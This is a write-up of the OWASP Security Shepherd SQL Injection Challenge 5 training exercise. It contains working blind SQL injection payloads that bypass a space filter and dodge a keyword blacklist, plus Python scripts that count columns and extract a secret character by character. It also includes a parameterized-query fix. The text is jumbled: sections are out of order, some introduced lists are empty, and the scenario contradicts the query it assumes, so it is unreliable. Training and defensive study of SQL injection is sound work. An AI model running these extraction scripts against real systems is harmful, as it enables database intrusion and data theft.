
SQL Injection Challenge 5 (Security Shepherd, "new" version)

If you enter 1 and 1=1, the server answers with an HTTP 200 OK, but the status code alone tells you nothing about whether the condition was evaluated. A payload such as 1 UNION SELECT username FROM users is clearly rejected by the filter, and the common factor is the space character. So the question becomes: how do we bypass space filtering?

Technique: Replace each space with an empty SQL comment (/**/), which the parser treats as whitespace, or with an alternative whitespace character that the filter does not check, sent URL-encoded: %0a (newline), %0d (carriage return) or %09 (tab). MySQL accepts all of these as token separators.

Solution: Replace every space with /**/.

1/**/and/**/1=1 passes the filter and evaluates exactly like 1 and 1=1, because the database parser sees the empty comment as a separator between tokens.

The developer believed prepared statements were used everywhere, but the LIKE clause in the admin search was built by string concatenation. The server-side input filter blocked single quotes but not backslashes, double quotes or parentheses, and client-side validation is trivially bypassed because an attacker can send requests directly, without the browser form.

The lesson: Never concatenate user input into SQL, not even into a LIKE clause. Pass the LIKE pattern as a bound parameter, and escape the wildcard characters % and _ (declaring the escape character with an ESCAPE clause) so that user-supplied text is matched literally.
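The following is an added example, not code from the page or from Security Shepherd, showing the concatenated LIKE search beside its parameterized form. It uses Python's sqlite3 module and a constructed notes table with an owner and a body column (hypothetical schema); the same pattern applies to JDBC PreparedStatement with the same LIKE ? ESCAPE '\' clause.

```python
import sqlite3

# Constructed sample data for this example (not the challenge's real schema).
NOTES = [
    ("guest", "shopping list: milk, 50% off coupon"),
    ("guest", "call the dentist"),
    ("admin", "private: rotate the DB password on Friday"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO notes VALUES (?, ?)", NOTES)
    return conn


def search_vulnerable(conn, owner, term):
    # The mistake the page describes: the owner filter is a bound parameter,
    # but the LIKE pattern is concatenated straight into the SQL text.
    sql = "SELECT body FROM notes WHERE owner = ? AND body LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql, (owner,))]


def escape_like(term, esc="\\"):
    # Escape the escape character first, then the two LIKE metacharacters,
    # so a user-supplied % or _ is matched literally rather than as a wildcard.
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_safe(conn, owner, term):
    # The wildcards are added in code around the escaped term, and the whole
    # pattern travels as a bound parameter; the SQL text never changes.
    pattern = "%" + escape_like(term) + "%"
    sql = "SELECT body FROM notes WHERE owner = ? AND body LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (owner, pattern))]


def demo():
    conn = make_db()
    # Closes the pattern literal, ORs in a tautology and comments out the rest.
    hostile = "' OR 1=1 --"
    return {
        "vulnerable": search_vulnerable(conn, "guest", hostile),
        "safe": search_safe(conn, "guest", hostile),
        "literal_50pct": search_safe(conn, "guest", "50%"),
        "literal_pct": search_safe(conn, "guest", "%"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The hostile term makes the concatenated query return every note, including the admin's, while the parameterized query returns nothing. The two literal searches show the second half of the lesson: without escaping, a search for % would match every guest note instead of only the one that actually contains a percent sign.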


Let's assume the underlying query is built by string concatenation, with the user's value dropped between two single quotes:

"SELECT first_name, last_name FROM user_data WHERE user_id = '" + userInput + "'"

Doing this manually takes hours. Use a Python script with requests. The script below scans the printable ASCII range linearly, one request per candidate character; a binary search on the character's code point (comparing ASCII(SUBSTRING(...)) against a midpoint) would cut that to about seven requests per character.

import requests

url = "http://localhost:8080/challenge5.jsp"
flag = ""
position = 1

while True:
    for ascii_val in range(32, 127):
        char = chr(ascii_val)
        # Blind boolean payload: every space replaced with /**/ to pass the
        # space filter, keywords case-shifted to dodge a keyword blacklist.
        # A single quote inside the flag would break this string comparison;
        # comparing ASCII(SUBSTRING(...)) to a number avoids that.
        payload = (
            f"1'/**/aNd/**/(SeLeCt/**/SuBsTrInG(flag,{position},1)/**/FrOm/**/users"
            f"/**/LiMiT/**/0,1)/**/=/**/'{char}'-- -"
        )
        params = {"userid": payload}
        resp = requests.get(url, params=params)

        if "User Found" in resp.text:
            flag += char
            print(f"Found: {flag}")
            position += 1
            break
    else:
        # No character matched at this position: the flag is complete
        print(f"Final flag: {flag}")
        break

Before we dive into the injection itself, let's establish context. OWASP Security Shepherd is a web and mobile application security training platform. Unlike an unstructured vulnerable VM, Shepherd is a deliberately flawed application with graded lessons and challenges designed to teach secure coding. It features escalating difficulty levels (Modules 1-10), with SQL Injection Challenge 5 acting as the bridge between novice "copy-paste" attackers and people who can develop an exploit by hand.

You’ve just completed Challenge 4, where you bypassed a login using a basic ' OR '1'='1 attack. Now, Challenge 5 presents a new target: "Secure Note-Taker Pro" — a minimalist web app that claims to have fixed all SQL injection vulnerabilities.

The challenge description reads:

"Our new note-taking app uses prepared statements for all database queries. However, one developer thought it would be 'more efficient' to dynamically build a search query for the admin panel. Your goal: retrieve the administrator's private note."

You are given a guest account:

The app has two pages:


The "new" in the challenge name matters. Earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. The "new" iteration, updated to line up with the current OWASP Top 10, introduced three critical changes:

These changes force the attacker to use blind, boolean-based, case-shifted injection.

Counting columns with ORDER BY is awkward under the space filter, so use UNION SELECT NULL instead and add one NULL per attempt (NULL is type-compatible with any column). Payload: 1'/**/UnIoN/**/SeLeCt/**/NULL/**/aNd/**/1=2-- -

If this returns no rows (False), try two columns. Payload: 1'/**/UnIoN/**/SeLeCt/**/NULL,NULL/**/aNd/**/1=2-- -

Expected result: When the number of NULLs matches the column count of the original SELECT (likely 2), the UNION is syntactically valid and the page reports "User Found" for the union row even though the 1=2 condition keeps the original lookup from matching. A mismatched NULL count is a SQL error, which the page shows as no result. This confirms 2 columns.
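To tie the three steps together (the /**/ space-filter bypass, the UNION SELECT NULL column count, and the blind boolean extraction), here is an added, self-contained example that is not part of the page or of Security Shepherd. It builds a hypothetical stand-in for the vulnerable page in Python's sqlite3: an in-memory database with the user_data table assumed above plus a hypothetical users table with a flag column, and a target that rejects any input containing a space, concatenates the rest into the query and answers only found / not found. The attack side uses the page's space-free, case-shifted payload style, and goes beyond the linear scan above by binary-searching the secret's length and then each character's code point. Two assumptions are worth noting: the example closes the injected quote with '1'='1 instead of a trailing "-- " comment, because that comment needs a space the filter would block; and SQLite spells the string functions unicode() and substr(), where MySQL would use ASCII() and SUBSTRING().

```python
import sqlite3

# Constructed stand-in for the challenge backend (hypothetical, not Shepherd's
# code): an in-memory SQLite DB with the user_data table the page assumes and
# a hypothetical users.flag column holding the secret we want to read.
SECRET = "S3cr3t_n0t3"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE user_data (user_id TEXT, first_name TEXT, last_name TEXT);"
        "INSERT INTO user_data VALUES ('1', 'Guest', 'User');"
        "CREATE TABLE users (username TEXT, flag TEXT);"
        f"INSERT INTO users VALUES ('admin', '{SECRET}');"
    )
    return conn


class Target:
    """Simulates the vulnerable page: drops requests containing a space,
    concatenates the rest into the query, answers only found / not found."""

    def __init__(self):
        self.conn = make_db()
        self.requests = 0

    def user_found(self, user_input):
        self.requests += 1
        if " " in user_input:          # the space filter the page describes
            return False
        sql = ("SELECT first_name, last_name FROM user_data "
               "WHERE user_id = '" + user_input + "'")
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:          # a syntax error looks like "not found"
            return False


def blind(cond):
    # Close the literal, AND in our condition, then re-balance the quote with
    # '1'='1 so no trailing "-- " comment (which needs a space) is required.
    return f"1'/**/aNd/**/({cond})/**/aNd/**/'1'='1"


def count_columns(target, max_cols=8):
    # A UNION is only valid when both sides have the same column count, so
    # the first NULL list that yields "found" tells us the original width.
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if target.user_found(f"x'/**/UnIoN/**/SeLeCt/**/{nulls}/**/aNd/**/'1'='1"):
            return n
    return None


# Scalar subquery pulling the secret; LIMIT keeps it to a single row.
SECRET_EXPR = "(SeLeCt/**/flag/**/FrOm/**/users/**/LiMiT/**/0,1)"


def extract_flag(target, max_len=64):
    # Binary search the length, then each character's code point: about
    # seven requests per character instead of up to 95 for a linear scan.
    # SQLite spells these unicode()/substr(); MySQL would use ASCII()/SUBSTRING().
    def bsearch(lo, hi, greater_than):
        while lo < hi:
            mid = (lo + hi) // 2
            if target.user_found(blind(greater_than(mid))):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = bsearch(0, max_len, lambda m: f"length({SECRET_EXPR})>{m}")
    chars = []
    for pos in range(1, length + 1):
        code = bsearch(32, 126, lambda m: f"unicode(substr({SECRET_EXPR},{pos},1))>{m}")
        chars.append(chr(code))
    return "".join(chars)


def demo():
    target = Target()
    cols = count_columns(target)
    flag = extract_flag(target)
    return cols, flag, target.requests


if __name__ == "__main__":
    print(demo())
```

Running demo() recovers the constructed secret in well under a hundred requests; the request counter on Target makes the saving over the 95-candidate linear scan visible. Against a real instance you would replace Target.user_found with an HTTP request that checks for the "User Found" marker, keeping the payload construction unchanged.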